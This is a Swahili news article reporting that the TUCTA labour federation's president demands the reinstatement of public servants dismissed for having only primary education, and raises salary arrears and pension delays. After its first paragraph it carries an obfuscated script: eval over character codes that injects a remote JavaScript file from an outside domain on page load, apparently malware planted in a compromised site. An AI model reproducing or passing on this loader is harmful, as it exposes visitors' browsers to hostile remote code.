<p>Rais wa TUCTA Tumaini Nyamhokya.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Na Steven Samwel – Morogoro.
Baraza kuu la shirikisho la vyama huru vya wafanyaazi nchini (TUCTA) limeitaka serikali kutengua uamuzi wa kuwaondoa kazini watumishi wa umma wenye elimu ya darasa la saba na kuwarudisha watumishi hao kazini ili waweze kupata haki zao za kiutumishi, ambapo imeelezwa kuwa uamuzi huo wa serikali ni kinyume na sheria kwani waliajiliwa kwa kufuata taratibu halali za ajira.
Kauli hiyo inatolewa na Rais wa TUCTA Tumaini Nyamhokya ikiwa ni maadhimio ya Baraza kuu la wajumbe wa shirikisho hilo , waliokutana mkoani hapa kujadili changamoto mbalimbali zinazo wakabili wanyakazi hususani ambazo zimesha wasilishwa katika vyama vyao pamoja na kuweka mikakati ya kukabiliana na changamoto hizo.
Anasema baraza limesikitishwa na uamuzi wa serikali kuwaondoa wafanyakazi walioajiliwa wakiwa na elimu ya msingi jambo ambalo limefanyika kinyume na sheria.
Katika hatua nyingine baraza hilo limeitaka serikali kusimamia kwa karibu suala la ulimbikizwaji wa mishahara kwa wafanyakazi wa sekta binafsi na serikali, kwani hali hiyo inabababisha kushuka kwa ari ya utendaji kazi.
Pia baraza hilo limesisitiza suala la upandishwaji wa madaraja na vyeo kwa watumishi wa umma pamoja na ucheleweshwaji wa malipo ya wastaafu kwa baadhi ya mifuko ya hifadhi ya jamii kwani jambo hilo limekua likisababisha ugumu wa maisha na msongo wa mawazo usioisha kwa baadhi ya wastaafu.
Recent Comments